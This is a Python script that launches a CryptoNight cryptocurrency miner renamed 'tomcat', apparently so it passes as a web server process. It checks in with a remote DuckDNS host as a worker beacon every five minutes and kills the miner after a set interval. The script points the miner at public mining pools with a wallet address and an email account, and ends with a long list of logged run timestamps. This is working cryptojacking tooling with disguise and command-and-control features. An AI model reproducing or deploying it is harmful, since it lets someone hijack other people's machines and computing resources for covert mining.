import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:01:05.381437
#2018-02-17 16:48:06.354581
#2018-02-17 18:36:05.515328
#2018-02-17 20:25:07.912004
#2018-02-17 22:12:06.568326
#2018-02-17 23:56:02.113040
#2018-02-18 01:46:07.581002
#2018-02-18 03:33:05.849009
#2018-02-18 05:21:04.126310
#2018-02-18 07:13:04.742638
#2018-02-18 09:01:05.007644
#2018-02-18 10:48:05.751324
#2018-02-18 12:36:06.624286
#2018-02-18 14:22:07.260785
#2018-02-18 16:13:04.668728
#2018-02-18 18:01:05.026365
#2018-02-18 19:48:01.466720
#2018-02-18 21:34:05.832779
#2018-02-18 23:23:04.700116
#2018-02-19 01:10:09.406275
#2018-02-19 02:56:07.705595
#2018-02-19 04:43:04.303658
#2018-02-19 06:27:07.036872
#2018-02-19 08:18:07.747940
#2018-02-19 10:07:01.328095
#2018-02-19 11:56:01.888360
#2018-02-19 13:43:05.514987
#2018-02-19 15:31:08.658808
#2018-02-19 17:19:01.792193
#2018-02-19 19:06:07.159818
#2018-02-19 20:52:04.949694
#2018-02-19 22:41:06.604932
#2018-02-20 00:25:06.158310
#2018-02-20 02:14:07.842779
#2018-02-20 04:06:04.610494
#2018-02-20 05:49:05.937358
#2018-02-20 07:36:04.585074
#2018-02-20 09:20:08.164406
#2018-02-20 11:05:08.783672
#2018-02-20 12:53:07.094596
#2018-02-20 14:38:05.886436
#2018-02-20 16:24:02.098184
#2018-02-20 18:10:10.225077
#2018-02-20 20:03:08.246977
#2018-02-20 21:51:08.421290
#2018-02-20 23:34:06.038763
#2018-02-21 01:18:08.632472
#2018-02-21 03:05:01.783994
#2018-02-21 04:52:07.609465
#2018-02-21 06:40:08.701992
#2018-02-21 08:27:06.816889
#2018-02-21 10:13:02.167053
#2018-02-21 12:01:05.984163
#2018-02-21 13:50:06.090734
#2018-02-21 15:35:05.910051
#2018-02-21 17:27:12.945354
#2018-02-21 19:16:06.272169
#2018-02-21 21:04:03.815373
#2018-02-21 22:51:06.995146
#2018-02-22 00:42:01.917025
#2018-02-22 02:29:04.069889
#2018-02-22 04:16:05.980643
#2018-02-22 06:01:05.404959
#2018-02-22 07:48:01.959797
#2018-02-22 09:36:06.236388
#2018-02-22 11:21:07.390479
#2018-02-22 13:07:01.257178
#2018-02-22 14:57:01.710727
#2018-02-22 16:42:04.653788
#2018-02-22 18:28:08.170011
#2018-02-22 20:21:08.448651
#2018-02-22 22:07:04.794968
#2018-02-22 23:54:07.400749
#2018-02-23 01:42:07.551345
#2018-02-23 03:31:07.274039
#2018-02-23 05:16:06.946562
#2018-02-23 07:01:05.514275
#2018-02-23 08:50:06.009985
#2018-02-23 11:07:07.418960
#2018-02-23 13:01:07.029499
#2018-02-23 14:46:11.412674
#2018-02-23 16:36:07.670229
#2018-02-23 18:23:08.922274
#2018-02-23 20:07:06.278979
#2018-02-23 21:54:04.325618
#2018-02-23 23:43:05.861882
#2018-02-24 01:36:04.391797
#2018-02-24 03:24:06.816069
#2018-02-24 05:09:07.873079
#2018-02-24 06:58:05.923972
#2018-02-24 08:49:05.833678
#2018-02-24 10:52:05.994406
#2018-02-24 12:40:05.722607
#2018-02-24 14:28:06.983594
#2018-02-24 16:16:05.348627
#2018-02-24 18:08:07.809985
#2018-02-24 19:54:04.337870
#2018-02-24 21:39:03.973430
#2018-02-25 00:28:06.359929
#2018-02-25 04:20:06.400551
#2018-02-25 07:51:06.145140